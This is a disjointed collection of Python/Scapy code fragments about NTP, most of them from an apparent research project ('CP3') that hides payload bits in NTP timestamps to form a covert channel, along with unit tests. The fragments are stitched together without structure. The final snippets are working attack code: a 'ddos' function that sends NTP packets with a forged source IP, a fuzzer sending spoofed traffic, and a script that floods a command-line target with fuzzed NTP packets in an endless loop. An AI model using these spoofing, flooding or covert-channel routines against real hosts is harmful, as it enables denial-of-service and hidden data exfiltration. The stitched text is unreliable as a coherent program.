def __restore_ntp_pck(self, ntp: NTP) -> NTP: self.log.debug('Send timestamp for reconstruction: ' + str(ntp.sent)) sent_time_stamp = datetime.fromtimestamp( ntplib.ntp_to_system_time(ntp.sent)) sent_time_stamp = sent_time_stamp.replace(year=datetime.now().year) sent_time_stamp_as_ntp = ntplib.system_to_ntp_time( sent_time_stamp.timestamp()) ntp.sent = sent_time_stamp_as_ntp self.log.debug('Send timestamp after reconstruction: ' + str(ntp.sent)) pck = CP3Package(ntp) if NTPMode.from_bit_string(pck.mode()) is NTPMode.CLIENT: self.log.debug("Restored in Client mode") ntp.ref = 0 ntp.orig = 0 ntp.recv = 0 if NTPMode.from_bit_string(pck.mode()) is NTPMode.SERVER \ or NTPMode.from_bit_string(pck.mode()) is NTPMode.BROADCAST_SERVER: self.log.debug("Restored in Server mode") origin_last_32 = pck.origin_timestamp()[32:64] received_last_32 = pck.receive_timestamp()[32:64] transmit_first_32 = pck.origin_timestamp()[0:32] pck.set_origin_timestamp(transmit_first_32 + origin_last_32) pck.set_receive_timestamp(transmit_first_32 + received_last_32) ntp = pck.ntp() self.log.debug("Reconstruction complete.") #ntp.show() return ntp
def test_get_cp3_mode_pck_has_year_2000_mode_2_returned(self): # Arrange ntp_timestamp = ntplib.system_to_ntp_time(datetime.now().replace(year=2000).timestamp()) ntp_pck = NTP() ntp_pck.sent = ntp_timestamp pck = CP3Package(ntp_pck=ntp_pck) # Act result = pck.get_cp3_mode() # Assert self.assertEqual(result, CP3Mode.PCK_2)
def ntp(self) -> NTP: """ :return: creates a scapy.NTP package from this raw package representation. """ raw = BitArray(bin=self._raw).bytes ntp = NTP(raw) return ntp
def handle_pck(self, packet: Packet) -> Packet: if packet[IP].src == self.server_addr: if not self.send_payload: self.log.debug("Sending of payload is deactivated.") return packet cp3_pck = CP3Package(packet[NTP]) if self.sending_status == 1: cp3_pck.set_cp3_mode_1() else: cp3_pck.set_cp3_mode_2() cp3_pck.add_payload(self.__next_payload()) self.log.info('CP3 payload added for intercepted package: ' + str(cp3_pck.extract_payload()) + " in CP3 mode " + str(cp3_pck.get_cp3_mode())) complete_pck = packet[IP] / packet[UDP] / NTP() complete_pck[NTP] = cp3_pck.ntp() return complete_pck elif packet[IP].src == self.client_addr: cp3_pck = CP3Package(packet[NTP]) if not self.cp3_handler.read_incoming_pck(cp3_pck): return packet ntp_restored = self.cp3_handler.restore_pck(cp3_pck) complete_restored = packet[IP] / packet[UDP] / ntp_restored complete_restored[NTP] = ntp_restored return complete_restored else: self.log.error( 'The given packet was not matching the sender/receiver address!' ) return packet
def _send_ntp_client_request(self, dst='pool.ntp.org', ntp=NTP()) -> Packet: pck = IP(dst=dst) / UDP() / ntp if self.debug: pck.show() pck = sr1(pck) if self.debug: pck.show() return pck
def test_check_pck_has_matching_ip_True_Returned(self): # Arrange interceptor = CP3Interceptor('3.3.3.3', '4.4.4.4') pck = IP(dst='1.1.1.1', src='3.3.3.3') / UDP() / NTP() # Act result = interceptor.check_pck(pck) # Assert self.assertTrue(result)
def test_handle_incoming_pck_is_marked_with_1_msg_added(self): # Arrange client = CP3Handler('') ntp_timestamp = ntplib.system_to_ntp_time( datetime.now().replace(year=1995).timestamp()) ntp_pck = NTP() ntp_pck.sent = ntp_timestamp pck = CP3Package(ntp_pck=ntp_pck) origin_first_32 = '11111111111110011110111111111111' received_first_32 = '11111110111111011110111111111111' last_32 = '11111111111111111111111111111111' pck.set_origin_timestamp(origin_first_32 + last_32) pck.set_receive_timestamp(received_first_32 + last_32) # Act client.read_incoming_pck(pck) # Assert self.assertEqual(origin_first_32 + received_first_32, client.msg)
def run(self, with_response: bool = True): """ Starts the sniffing for incoming NTP client packages. Note that further packages are not sniffed while one package is processed. """ print('Starting server.... listening on interface ' + self.sniff_interface) while True: pck = self.next_ntp_packet() received_time = ntp_time_now() if pck[IP].dst != self._host_ip: print('This package was not meant for the server...') continue pck_ntp = pck[NTP] if pck_ntp.mode != 3: continue self._req_interceptor.intercept_req(pck_ntp) if not with_response: continue if self.debug: print('Got a NTP client request, creating response.') # ntp_resp = self._send_ntp_client_request(ntp=pck_ntp) response_from_server_ntp = NTP() # ntp_resp[NTP] response_from_server_ntp.recv = received_time response_from_server_ntp.ref = self.reference_time # response_from_server_ntp.id = str(pck[IP].dst) response_from_server_ntp = self._res_interceptor.intercept_res( response_from_server_ntp) response = IP(dst=pck[IP].src, src=pck[IP].dst) / UDP() / response_from_server_ntp if self.debug: response.show() send(response)
def run(self): self.log.info('# Start experiment with n=' + str(self._n)) i = 0 while i < self._n: i += 1 self.log.info('\n### Iteration: ' + str(i) + '/' + str(self._n)) # sleep_time = random.uniform(0, self._max_sleep) sleep_time = 0 self.log.info('Delay: ' + str(sleep_time)) sleep(sleep_time) request = IP(dst=self._server_addr) / UDP() / NTP() response = sr1(request, timeout=2) if response is None: self.log.info( 'Error: Server not reached within time. Increasing n by 1') self._n += 1 self._error_counter_timeout += 1 continue response[NTP].show() raw_ntp = RawNTP(response[NTP]) self._process_ntp_result(raw_ntp) self._show_results()
def init_ntp_pck(num_of_digits_to_fill_up: int = 12) -> NTP: """ Creates a new NTP package, fills all 4 64 bit timestamps with the current time and fills up the last bits with random values, since they are set to 0 by Scapy :param num_of_digits_to_fill_up: The amount of digits to fill up. :return: The newly created NTP package """ ntp = NTP() ntp.ref = ntp_time_now() ntp.sent = ntp_time_now() ntp.orig = ntp_time_now() ntp.recv = ntp_time_now() raw_ntp = RawNTP(ntp) f_ref = raw_ntp.reference_timestamp() f_trans = raw_ntp.transmit_timestamp() f_orig = raw_ntp.origin_timestamp() f_recv = raw_ntp.receive_timestamp() for i in range(num_of_digits_to_fill_up): pos = 64 - i f_ref = f_ref[:pos - 1] + str(random.randint(0, 1)) + f_ref[pos:] f_trans = f_trans[:pos - 1] + str(random.randint(0, 1)) + f_trans[pos:] f_orig = f_orig[:pos - 1] + str(random.randint(0, 1)) + f_orig[pos:] f_recv = f_recv[:pos - 1] + str(random.randint(0, 1)) + f_recv[pos:] assert len(f_ref) == 64 assert len(f_trans) == 64 assert len(f_orig) == 64 assert len(f_recv) == 64 raw_ntp.set_reference_timestamp(f_ref) raw_ntp.set_transmit_timestamp(f_trans) raw_ntp.set_origin_timestamp(f_orig) raw_ntp.set_receive_timestamp(f_recv) ntp = raw_ntp.ntp() return ntp
def init_ntp_client_pck(num_of_digits_to_fill_up: int = 12): """ Creates a new NTP package, fills only the transmit 64 bit timestamps with the current time and fills up the last bits with random values, since they are set to 0 by Scapy :param num_of_digits_to_fill_up: The amount of digits to fill up. :return: The newly created NTP package """ ntp = NTP() ntp.sent = ntp_time_now() ntp.ref = 0 ntp.orig = 0 ntp.recv = 0 raw_ntp = RawNTP(ntp) f_trans = raw_ntp.transmit_timestamp() for i in range(num_of_digits_to_fill_up): pos = 64 - i f_trans = f_trans[:pos - 1] + str(random.randint(0, 1)) + f_trans[pos:] assert len(f_trans) == 64 raw_ntp.set_transmit_timestamp(f_trans) ntp = raw_ntp.ntp() return ntp
log = file_logger(path='cp3_experiment_results.log', logger_name='CP3-Logger') N = 10000 server_address = '192.168.50.102' deviations = 0 error_counter = 0 log.info("Starting CP3 distribution experiment with N=" + str(N) + " and server address=" + str(server_address)) i = 0 while i < N: i += 1 log.debug("Iteration " + str(i)) ntp = NTP() ntp.orig = None request = IP(dst=server_address) / UDP() / ntp response = sr1(request, timeout=2) if response is None: error_counter += 1 i -= 1 log.info('Error: Server not reached within time.') continue log.debug("Response from: " + response[IP].src) ntp_raw = RawNTP(response[NTP]) if (ntp_raw.origin_timestamp()[0:32] != ntp_raw.transmit_timestamp()[0:32]) \ or (ntp_raw.origin_timestamp()[0:32] != ntp_raw.receive_timestamp()[0:32]): deviations += 1 log.info("Deviation detected")
def main_function(targetip, numberOfPackets): for i in range(1, int(numberOfPackets)): sr1(IP(dst=targetip) / fuzz(TCP(dport=80) / NTP(version=4)), timeout=0) # wysyłanie spoofingu domyślnie na port 80 return 'Fuzzing done'
def ddos(self, client, ntp_server): ip = IP(src=client, dst=ntp_server) send(ip / UDP() / NTP())
#!/usr/bin/env python # -*- encoding: utf-8 -*- # __author__ = '090h' __license__ = 'GPL' from sys import argv, exit from scapy.all import * from scapy.layers.inet import IP, UDP from scapy.layers.ntp import NTP send(IP(dst=argv[1]) / fuzz(UDP() / NTP(version=4)), loop=1)